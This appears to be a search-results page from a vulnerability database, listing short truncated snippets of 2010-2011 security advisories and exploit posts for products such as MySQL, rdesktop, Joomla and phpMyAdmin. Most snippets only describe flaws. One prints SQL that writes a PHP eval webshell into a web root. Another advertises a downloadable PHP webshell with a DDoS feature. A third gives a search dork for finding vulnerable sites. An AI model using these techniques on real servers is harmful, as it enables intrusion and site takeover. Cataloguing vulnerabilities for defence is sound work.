5978 matches found
ATutor AChecker 1.2 SQL Injection
AChecker 1.2 Multiple Error-Based SQL Injection vulnerabilities Vendor: ATutor Inclusive Design Institute Product web page: http://www.atutor.ca Affected version: 1.2 build r530 Summary: AChecker is an open source Web accessibility evaluation tool. It can be used to review the accessibility of We...
CVE-2011-0838
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.1.0.7, 11.2.0.1, and 11.2.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to create procedure privileges...
CVE-2011-0838
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.1.0.7, 11.2.0.1, and 11.2.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to create procedure privileges...
PG Newsletter Cross Site Scripting
%+ $...............4.........|.......0............// %+ %+ %+ %++++++++++++++++++++++++++++++++++++++++ Exploit Title: PG Newsletter persistent XSS vulnerability Vendor: demo.newsletter.pro Author: $4d0//r007k17 a.k.a Raghavendra Karthik D My Blog: http://www.shadowrootkit.wordpress.com Google...
phpmyadmin get shell four ways to summarize and repair-vulnerability warning-the black bar safety net
Method one: CREATE TABLE mysql.study 7on TEXT NOT NULL ; INSERT INTO mysql.study 7on VALUES '? php @eval$POST7on?& gt;'; SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php'; ---- Or more simultaneously executed in the database: mysql create a table named: study, the field for the 7on, the 导出 到...
DEBIAN-CVE-2011-1595
Directory traversal vulnerability in the diskcreate function in disk.c in rdesktop before 1.7.0, when disk redirection is enabled, allows remote RDP servers to read or overwrite arbitrary files via a .. dot dot in a pathname...
Devil shell v1.2 - Php shell with DDoS feature !
Devil shell v1.2 - Php shell with DDoS feature ! Features : 1. Design 2. Permission Change of file / Folders 3. Improved DDoS 4. Create Folder 5. Multi uploading 6. Encrypted Title so hard to find by Google. Download Link Username : ugdevil Password : 1234567 For further Query mail me at :...
rdesktop remote file access
Directory traversal vulnerability in the diskcreate function in disk.c in rdesktop before 1.7.0, when disk redirection is enabled, allows remote RDP servers to read or overwrite arbitrary files via a .. dot dot in a pathname...
Social CMS 1.0.2 Cross Site Request Forgery
Date: Wed 20 april 2011 11:18:22 AM Vendor: www.socialcms.com Download: http://sourceforge.net/projects/socialcms/ --- input type="hidden" name="INconfigurat...
Mandriva Linux Security Advisory : xmlsec1 (MDVSA-2011:063)
A vulnerability was discovered and corrected in xmlsec1 : xslt.c in XML Security Library aka xmlsec before 1.2.17, as used in WebKit and other products, when XSLT is enabled, allows remote attackers to create or overwrite arbitrary files via vectors involving the libxslt output extension and a...
plone: unauthorized remote administrative access
Unspecified vulnerability in Plone 2.5 through 4.0, as used in Conga, luci, and possibly other products, allows remote attackers to obtain administrative access, read or create arbitrary content, and change the site skin via unknown vectors...
Movavi VideoSuite 8.0 Buffer Overflow
!/usr/bin/perl Title : MovaviVideoSuite8.0 'Create SlideShow' Buffer Overflow Author : KedAns-Dz E-mail : [email protected] Home : HMD/AM 30008/04300 - Algeria -00213555248701 Twitter page : twitter.com/kedans Tested on : windows XP SP3 Français & Arabic Target : Movavi Video Suite 8.0 Note : Thi...
dotProject 2.1.5 - Cross-Site Request Forgery
dotProject 2.1.5 - Cross-Site Request Forgery Source: http://packetstormsecurity.org/files/view/98245/dotProject2.1.5-xsrf.txt input type="hidden" name="use...
Stack overflow
Stack-based buffer overflow in the IMAP server component in GroupWise Internet Agent GWIA in Novell GroupWise 7.x before 7.0 post-SP4 FTF and 8.x before 8.0 SP2 allows remote attackers to execute arbitrary code via a long mailbox name in a CREATE command...
Cross site request forgery (csrf)
Cross-site request forgery CSRF vulnerability in news/admin.php in N-13 News 3.4, 3.7, and 4.0 allows remote attackers to hijack the authentication of administrators for requests that create new users via the options action. NOTE: some of these details are obtained from third party information...
MySQL: CREATE TABLE ... SELECT causes crash when KILL_BAD_DATA is returned (MySQL Bug#55826)
MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 does not properly propagate type errors, which allows remote attackers to cause a denial of service server crash via crafted arguments to extreme-value functions such as 1 LEAST and 2 GREATEST, related to KILLBADDATA and a "CREATE...
Code injection
MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 does not properly propagate type errors, which allows remote attackers to cause a denial of service server crash via crafted arguments to extreme-value functions such as 1 LEAST and 2 GREATEST, related to KILLBADDATA and a "CREATE...
CVE-2010-3833
CVE-2010-3833 affects MySQL 5.0/5.1/5.5 where type errors are not properly propagated, enabling remote DoS (server crash) from crafted inputs to functions like LEAST and GREATEST, tied to KILL_BAD_DATA and a CREATE TABLE ... SELECT. The MiracleLinux advisories AXSA:2011-32:01 and AXSA:2010-485:04...
PT-2011-1484 · Xen +2 · Xen +2
Name of the Vulnerable Software and Affected Versions: Xen version 3.1.2 Linux kernel version 2.6.18 on Red Hat Enterprise Linux RHEL 5 Description: The issue allows guest OS users to cause a denial of service, resulting in a host OS panic. This occurs when there is an attempted access to a virtu...
Joomla! Component JE Auto - Local File Inclusion
Joomla! Component JE Auto - Local File Inclusion Name : Joomla comjeauto LFI Vulnerability Date : Dec,7 2010 Vendor Url :http://joomlaextensions.co.in/jeauto Dork:inurl:comjeauto Author : Sid3^effects aKa HaRi Big hugs : Th3 RDX,Hananbutt, special thanks to : r0073r inj3ct0r.com,L0rd...